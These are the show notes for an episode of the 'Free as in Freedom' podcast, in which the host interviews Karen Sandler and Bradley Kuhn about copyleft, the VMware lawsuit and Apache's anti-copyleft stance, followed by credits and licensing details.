Free as in Freedom host Christopher Allan Webber interviews Karen Sandler and Bradley Kuhn about their work on copyleft and at Software Freedom Conservancy. You can become a Supporter of this work! Show Notes: Bradley mentioned Cygnus Solutions, ultimately acquired by Red Hat, which was an early for-profit supporter of copylefted projects. Bradley and Karen discussed the VMware lawsuit. Chris Webber wrote this blog post in response to a Shane Curcuru, who is VP of Brand Management at the Apache Software Foundation, anti-copyleft talk at OSCON 2015. Shane's talk is consistent with Apache Software Foundation's historical and recent anti-copyleft positions (12:23) Send feedback and comments on the cast to . You can keep in touch with Free as in Freedom on our IRC channel, #faif on irc.freenode.net, and by following Conservancy on identi.ca and and Twitter. Free as in Freedom is produced by Dan Lynch of danlynch.org. Theme music written and performed by Mike Tarantino with Charlie Paxson on drums. The content of this audcast, and the accompanying show notes and music are licensed under the Creative Commons Attribution-Share-Alike 4.0 license (CC BY-SA 4.0).